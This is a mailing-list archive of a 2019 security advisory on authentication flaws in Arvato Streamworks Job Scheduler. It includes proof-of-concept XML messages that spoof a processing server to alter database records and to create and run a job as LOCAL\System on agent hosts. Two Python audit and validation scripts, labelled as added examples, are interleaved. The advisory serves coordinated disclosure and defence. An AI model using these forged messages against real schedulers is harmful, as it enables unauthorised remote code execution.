<!--X-Body-Begin-->
<!--X-User-Header-->
<a href="/fulldisclosure/"><img src="/images/fulldisclosure-logo.png" class="l-logo right" alt="fulldisclosure logo" width="80"></a>
<h2 class="m-list"><a href="/fulldisclosure/">Full Disclosure</a>
mailing list archives</h2>
<!--X-User-Header-End-->
<!--X-TopPNI-->
<div class="nav-bar">
<div class="nav-link">
<a href="41"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="date.html#42">By Date</a>
<a href="43"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
<div class="nav-link">
<a href="41"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="index.html#42">By Thread</a>
<a href="43"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
</div>
<!--X-TopPNI-End-->
<!--X-MsgBody-->
<!--X-Subject-Header-Begin-->
<h1 class="m-title">secuvera-SA-2016-01: Multiple authentication weaknesses in Arvato Systems Streamworks Job Scheduler</h1>
<hr>
<!--X-Subject-Header-End-->
<!--X-Head-of-Message-->
<em>From</em>: Simon Bieber <sbieber () secuvera de>
<em>Date</em>: Mon, 14 Jan 2019 12:17:45 +0100
<!--X-Head-of-Message-End-->
<!--X-Head-Body-Sep-Begin-->
<hr>
<!--X-Head-Body-Sep-End-->
<!--X-Body-of-Message-->
<pre style="margin: 0em;">
Affected Products
</pre><tt> Streamworks Job Scheduler Release 7 (older/newer releases have not
</tt><tt>been tested)
</tt><pre style="margin: 0em;">
References
</pre><tt> Secuvera-SA-2016-01
</tt><tt><a rel="nofollow" href="https://www.secuvera.de/advisories/secuvera-SA-2016-01.txt">https://www.secuvera.de/advisories/secuvera-SA-2016-01.txt</a> (used for
</tt><tt>updates)
</tt><tt> No CVE number could be assigned (vendor not listed under
</tt><tt>cve.mitre.org/data/board/archives/2016-01/msg00015.html)
</tt><pre style="margin: 0em;">
Summary:
 Arvato Systems Streamworks Job Scheduler is a software product for
 automation purposes. It helps "to plan, maintain, control and monitor
 all of your automatable IT processes" (source: vendor product homepage).
 It consists of different types of services: an application server daemon
 and a processing server daemon that controls one or multiple agent
 daemons installed on the operating servers where the workload has to be
 done.
 During a penetration test at a customer's site, four weaknesses
 concerning communication authentication were discovered:
 1) All agents installed on server systems use the same X.509
 certificate and private key that were issued by the vendor for
 authentication.
 2) The processing server component does not check received messages
 properly for authenticity.
 3) Agents installed on servers do not check received messages properly
 for authenticity.
 4) Agents and processing servers are vulnerable to the TLS Heartbleed
 attack (CVE-2014-0160, see <a rel="nofollow" href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0160">https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0160</a>).
Effect:
 1) If systems are compromised and the authentication material is
 stolen, all certificates have to be revoked and replaced. In addition,
 because every agent shares the same key, this expands the effect of 3)
 to the entire environment, not just single systems.
 2) An attacker with knowledge of the message syntax of the product and
 the authentication material is able to add, change or delete data
 within the Streamworks database.
 3) An attacker with knowledge of the message syntax of the product and
 the authentication material is able to create new or execute available
 jobs on servers with agents installed that are located within the same
 network. This can lead to a complete loss of integrity, confidentiality
 or availability of the respective system or of data stored/processed
 on it.
 4) An unauthenticated remote attacker is able to read content within
 system memory.

Vulnerable components and scripts:
Streamworks Job Scheduler Processing Server Release 7.1
Streamworks Job Scheduler Agent Release 7.1
older releases have not been tested
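</pre>
<p>Finding 1 says every agent presents the same vendor-issued certificate and key. The fleet check below is an added example, not part of this advisory and not the vendor's tooling: it fetches the leaf certificate each host presents on the agent port, fingerprints it, and reports fingerprints that more than one host presents. Assumptions not stated in the advisory: that agents speak TLS directly on TCP/30000 (the DestinationEndpoint port used in the Examples section) and the processing server on TCP/9600; the host names and fingerprints in the embedded sample are constructed.</p>

```python
"""Fleet check for finding 1 of secuvera-SA-2016-01: do all Streamworks
agents present one and the same TLS certificate?

Added example, not part of the advisory or of the vendor's product.
Assumption: agents terminate TLS on TCP/30000 (the DestinationEndpoint port
in the advisory's PoC); the port is a parameter in case that is wrong.
"""
from __future__ import annotations

import hashlib
import socket
import ssl
from collections import defaultdict

AGENT_PORT = 30000  # assumption, taken from the PoC's DestinationEndpoint Port


def fetch_leaf_fingerprint(host: str, port: int = AGENT_PORT, timeout: float = 5.0) -> str:
    """Return the SHA-256 fingerprint (hex) of the certificate the peer presents.
    Verification is switched off on purpose: we want the certificate even when
    it is self-signed or chains to a private vendor CA, and nothing is sent on
    this connection beyond the handshake."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False          # must precede verify_mode = CERT_NONE
    ctx.verify_mode = ssl.CERT_NONE
    with socket.create_connection((host, port), timeout=timeout) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            der = tls.getpeercert(binary_form=True)
    return hashlib.sha256(der).hexdigest()


def group_by_fingerprint(fingerprints: dict[str, str]) -> dict[str, list[str]]:
    """Map fingerprint -> sorted list of hosts that presented it."""
    groups: dict[str, list[str]] = defaultdict(list)
    for host, fingerprint in fingerprints.items():
        groups[fingerprint].append(host)
    return {fp: sorted(hosts) for fp, hosts in groups.items()}


def shared_certificates(fingerprints: dict[str, str]) -> dict[str, list[str]]:
    """Only the fingerprints presented by more than one host.
    Every entry means that the private key stolen from one listed host
    impersonates all the others (Effect 1), and that the client certificate
    cannot tell those hosts apart, which any message-origin check in 2) and 3)
    would have to rely on."""
    return {fp: hosts for fp, hosts in group_by_fingerprint(fingerprints).items()
            if len(hosts) > 1}


def audit(hosts: list[str], port: int = AGENT_PORT) -> dict[str, list[str]]:
    """Fingerprint every reachable host and report the shared certificates."""
    fingerprints: dict[str, str] = {}
    for host in hosts:
        try:
            fingerprints[host] = fetch_leaf_fingerprint(host, port)
        except (OSError, ssl.SSLError) as exc:
            print(f"{host}: no TLS handshake on {port} ({exc})")
    return shared_certificates(fingerprints)


# Constructed sample (not real hosts, not real certificates): three of four
# agents present the same certificate, as the advisory describes.
SAMPLE_FINGERPRINTS = {
    "agent-a.example.test": "aa" * 32,
    "agent-b.example.test": "aa" * 32,
    "agent-c.example.test": "aa" * 32,
    "agent-d.example.test": "bb" * 32,
}

if __name__ == "__main__":
    import sys
    result = audit(sys.argv[1:]) if len(sys.argv) > 1 else shared_certificates(SAMPLE_FINGERPRINTS)
    for fp, hosts in result.items():
        print(f"certificate {fp[:16]}... shared by {len(hosts)} hosts: {', '.join(hosts)}")
```

<p>Run it with a list of agent host names to audit a real fleet, or without arguments to see the constructed sample. A clean result is a one-to-one mapping of hosts to fingerprints; anything else means a per-host certificate rollout is still outstanding after the upgrade. The same host list is a reasonable input for checking finding 4, for instance with nmap's ssl-heartbleed script against ports 30000 and 9600.</p>
<pre style="margin: 0em;">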
Examples:
 In the following, samples to exploit 2) and 3) are given. Replace the
 information within square brackets:
 2) By sending the following XML message to a processing server it is
 possible to change the system information of a legitimately configured
 client, as proof-of-concept. The system OS info was slightly changed:
<AgentNotifyStarted ProcessId="7044" AgentVersion="3.1.36">
<ComHeader Version="1.0">
<MandatorCode>0100</MandatorCode>
<MsgCreateTime>[YYYY]-[MM]-[DD]T[HH]:[MM]:[SS].745Z</MsgCreateTime>
<MsgSendTime>[YYYY]-[MM]-[DD]T[HH]:[MM]:[SS].963Z</MsgSendTime>
<SourceEndpoint Address="0.0.0.0" Port="30000"
  SysId="[Hostname of legitimate Client]" />
<DestinationEndpoint Address="[FQDN of Processing server]" Port="9600"
  SysId="[FQDN of Processing server]" />
<Sequence>0</Sequence>
</ComHeader>
<SystemInformation>
<OsType>Windows</OsType>
<OsInfo>Pentest Windows!</OsInfo>
<OsLocale>de_DE.windows-1252</OsLocale>
</SystemInformation>
<KnownJobsList>
</KnownJobsList>
<FileTransferOptions Mode="ALL" BlockSize="0" />
<Cli CliOptions="Enabled" />
</AgentNotifyStarted>
-------------
 3) By sending an XML message of the following type, a new job is
 created and executed on a system with an agent installed:
<ServerRequestStartJob>
<ComHeader Version="0.1">
<MandatorCode>0100</MandatorCode>
<MsgCreateTime>[YYYY]-[MM]-[DD]T[HH]:[MM]:[SS].1061367Z</MsgCreateTime>
<MsgSendTime>[YYYY]-[MM]-[DD]T[HH]:[MM]:[SS].1061367Z</MsgSendTime>
<SourceEndpoint Address="[FQDN of processing server]" Port="9600"
  SysId="[FQDN of processing server]" />
<DestinationEndpoint Address="[IP of Server with agent installed]" Port="30000"
  SysId="[Hostname of server with agent installed]" />
<Sequence>1</Sequence>
<MandatorId>0100</MandatorId>
</ComHeader>
<JobStartInfo>
<JobInfo ServerJobId="118291965_1" ExecutionNo="1" PlanDate="[YYYY]-[MM]-[DD]"
  StreamName="[NewStreamName]" JobName="[NewJobName]" Run="1" />
<UserName>[Username under which the agent should run the script,
  e.g. LOCAL\System]</UserName>
<Password>[Add password of the user if needed]</Password>
<UseUserProfile>true</UseUserProfile>
<MainScript>[base64-encoded script code, e.g.
  "cmVtDQpDOlxXaW5kb3dzXE5vdGVwYWQuZXhl", which decodes to the two-line
  batch script "rem" / "C:\Windows\Notepad.exe" and starts notepad.exe
  on a Windows host]</MainScript>
<KeepJoblogDays>10</KeepJoblogDays>
</JobStartInfo>
</ServerRequestStartJob>
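</pre>
<p>Findings 2 and 3 come down to the receiver trusting whatever SourceEndpoint a message claims. The following is an added example of the check a receiving agent would need; it is not code from the advisory and not Arvato's fix. It binds the claimed SourceEndpoint SysId to a peer identity established by TLS (assumed here to be the subject CN of a per-host client certificate, which the tested release does not have according to finding 1), accepts job starts only from known processing servers, and rejects stale messages. The sample message is the ServerRequestStartJob PoC above with its placeholders filled with constructed values; the host names, the trusted-server list and the five-minute freshness window are assumptions.</p>

```python
"""Receiver-side authenticity check for a Streamworks-style
ServerRequestStartJob (findings 2 and 3 of secuvera-SA-2016-01).

Added example; not code from the advisory or from the vendor. Assumption:
the agent terminates TLS with client authentication and learns a per-host
peer identity (e.g. the certificate's subject CN) that it can compare
against the SourceEndpoint the message claims.
"""
from __future__ import annotations

import base64
import xml.etree.ElementTree as ET
from datetime import datetime, timedelta, timezone

# Processing servers an agent may accept job starts from (constructed names).
TRUSTED_SERVERS = {"ps01.example.test", "ps02.example.test"}

# Constructed sample: the advisory's ServerRequestStartJob PoC with its
# bracketed placeholders filled in. MainScript is the advisory's own value.
START_JOB = b"""<ServerRequestStartJob>
<ComHeader Version="0.1">
<MandatorCode>0100</MandatorCode>
<MsgCreateTime>2016-05-12T10:00:00.1061367Z</MsgCreateTime>
<MsgSendTime>2016-05-12T10:00:00.1061367Z</MsgSendTime>
<SourceEndpoint Address="ps01.example.test" Port="9600" SysId="ps01.example.test" />
<DestinationEndpoint Address="192.0.2.21" Port="30000" SysId="agent-a" />
<Sequence>1</Sequence>
<MandatorId>0100</MandatorId>
</ComHeader>
<JobStartInfo>
<JobInfo ServerJobId="118291965_1" ExecutionNo="1" PlanDate="2016-05-12" StreamName="PENTEST" JobName="POC" Run="1" />
<UserName>LOCAL\\System</UserName>
<Password></Password>
<UseUserProfile>true</UseUserProfile>
<MainScript>cmVtDQpDOlxXaW5kb3dzXE5vdGVwYWQuZXhl</MainScript>
<KeepJoblogDays>10</KeepJoblogDays>
</JobStartInfo>
</ServerRequestStartJob>
"""

# Receipt time of the sample in the "genuine" scenario below (constructed).
NOW = datetime(2016, 5, 12, 10, 1, 0, tzinfo=timezone.utc)


class RejectedMessage(Exception):
    """Raised for any message the agent must not act on."""


def parse_msg_time(text: str) -> datetime:
    """Parse the advisory's timestamp form YYYY-MM-DDTHH:MM:SS.fffffffZ.
    Seven fractional digits are more than datetime.fromisoformat() accepts on
    older Pythons, so truncate to microseconds by hand."""
    if not text.endswith("Z"):
        raise RejectedMessage("timestamp is not UTC")
    main, _, frac = text[:-1].partition(".")
    stamp = datetime.strptime(main, "%Y-%m-%dT%H:%M:%S")
    micros = int((frac + "000000")[:6]) if frac else 0
    return stamp.replace(microsecond=micros, tzinfo=timezone.utc)


def authenticate_start_job(xml_bytes: bytes, peer_identity: str, now: datetime,
                           max_skew: timedelta = timedelta(minutes=5)) -> dict:
    """Accept a ServerRequestStartJob only if
      1. the authenticated TLS peer is one of the known processing servers,
      2. the SourceEndpoint SysId the message claims is that very peer, and
      3. MsgCreateTime lies within max_skew of the local clock (no replay).
    Returns the parameters the agent would then go on to execute."""
    root = ET.fromstring(xml_bytes)
    if root.tag != "ServerRequestStartJob":
        raise RejectedMessage(f"unexpected message type {root.tag}")
    header = root.find("ComHeader")
    source = header.find("SourceEndpoint") if header is not None else None
    if source is None:
        raise RejectedMessage("ComHeader/SourceEndpoint missing")
    if peer_identity not in TRUSTED_SERVERS:
        raise RejectedMessage(f"peer {peer_identity!r} is not a processing server")
    claimed = source.get("SysId")
    if claimed != peer_identity:
        raise RejectedMessage(f"message claims source {claimed!r} but came from {peer_identity!r}")
    created = parse_msg_time(header.findtext("MsgCreateTime", ""))
    if abs(now - created) > max_skew:
        raise RejectedMessage(f"MsgCreateTime {created.isoformat()} is outside +/-{max_skew}")
    job = root.find("JobStartInfo")
    info = job.find("JobInfo") if job is not None else None
    if info is None:
        raise RejectedMessage("JobStartInfo/JobInfo missing")
    return {
        "stream": info.get("StreamName"),
        "job": info.get("JobName"),
        "user": job.findtext("UserName"),
        "script": base64.b64decode(job.findtext("MainScript", "")).decode(),
    }


def check(xml_bytes: bytes, peer_identity: str, now: datetime) -> tuple[bool, object]:
    """(True, job parameters) when accepted, (False, reason) when rejected."""
    try:
        return True, authenticate_start_job(xml_bytes, peer_identity, now)
    except RejectedMessage as exc:
        return False, str(exc)


def demo() -> dict[str, tuple[bool, object]]:
    """Four deliveries of the same message; only the first is legitimate."""
    return {
        "genuine": check(START_JOB, "ps01.example.test", NOW),
        # finding 3: an attacker on another agent host sends the forged message
        "from_agent_host": check(START_JOB, "agent-b", NOW),
        # a second, trusted processing server relays a message that claims ps01
        "wrong_source": check(START_JOB, "ps02.example.test", NOW),
        # the genuine server's own message, captured and replayed a day later
        "replayed": check(START_JOB, "ps01.example.test", NOW + timedelta(days=1)),
    }


if __name__ == "__main__":
    for name, (accepted, detail) in demo().items():
        print(f"{name:16} {'ACCEPT' if accepted else 'REJECT'}: {detail}")
```

<p>The check is only as strong as the peer identity it compares against: with the fleet-wide certificate of finding 1, every agent and, if it shares the same material, every attacker holding it would present the same identity, and the binding collapses to the vulnerable behaviour the advisory describes. Per-host certificates and this binding therefore have to be deployed together.</p>
<pre style="margin: 0em;">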
Solution:
Install Streamworks Release 9.3
(<a rel="nofollow" href="https://it.arvato.com/de/solutions/it-solutions/lp/streamworks-release-9-3.html">https://it.arvato.com/de/solutions/it-solutions/lp/streamworks-release-9-3.html</a>
 - page available in German only)
Disclosure Timeline:
2016/05/12 vulnerabilities discovered
2016/05/30 vendor initially contacted
2016/06/13 sales representative replied
2016/06/14 technically responsible contact details received
2016/07/01 technical personnel contacted, appointment to discuss findings
           made
2016/07/11 submitted technical details to responsible personnel
2016/07/12 responsible product manager replied. Committed to extending
           the disclosure timeline for understandable reasons. New
           disclosure timeline: end of September 2016
2016/09/08 product manager replied, suggested a meeting to discuss fixes
2016/09/27 meeting took place, half of the vulnerabilities were fixed.
           Timeline until disclosure extended again due to difficult
           changes. Disclosure timeline extended to end of April 2017
2017/04/20 contacted vendor again to remind of the near end of the
           disclosure timeline
2017/04/27 reply and ongoing discussion about when the fix will be shipped
2017/05/20 vendor replied that, based on customer experience, fewer
           releases are being made. The fix will be shipped in the second
           quarter of 2018. Disclosure timeline extended until the end of
           June 2018
2018/04/03 contacted vendor as a reminder and to get a release ship date
2018/04/09 vendor replied that the issues will be fixed in release 9.3
           (shipped in the 2nd quarter of 2018). Final disclosure
           timeline: 2019/01/14, after a sufficient grace period for
           customers to install the fixed release
2019/01/14 public advisory disclosure
Credits
Simon Bieber, secuvera GmbH
sbieber () secuvera de
<a rel="nofollow" href="https://www.secuvera.de">https://www.secuvera.de</a>
Disclaimer:
 All information is provided without warranty. The intent is to provide
 information to secure infrastructure and/or systems, not to be able to
 attack or damage. Therefore secuvera shall not be liable for any direct
 or indirect damages that might be caused by using this information.
_______________________________________________
Sent through the Full Disclosure mailing list
<a rel="nofollow" href="https://nmap.org/mailman/listinfo/fulldisclosure">https://nmap.org/mailman/listinfo/fulldisclosure</a>
Web Archives & RSS: <a rel="nofollow" href="http://seclists.org/fulldisclosure/">http://seclists.org/fulldisclosure/</a>
</pre>
<!--X-Body-of-Message-End-->
<!--X-MsgBody-End-->
<!--X-Follow-Ups-->
<hr>
<!--X-Follow-Ups-End-->
<!--X-References-->
<!--X-References-End-->
<!--X-BotPNI-->
<h3 class="m-thread">Current thread:</h3>
<ul class="thread">
<li><strong>secuvera-SA-2016-01: Multiple authentication weaknesses in Arvato Systems Streamworks Job Scheduler</strong> <em>Simon Bieber (Jan 15)</em>
</li></ul>
<!--X-BotPNI-End-->
<!--X-User-Footer-->
<!--X-User-Footer-End-->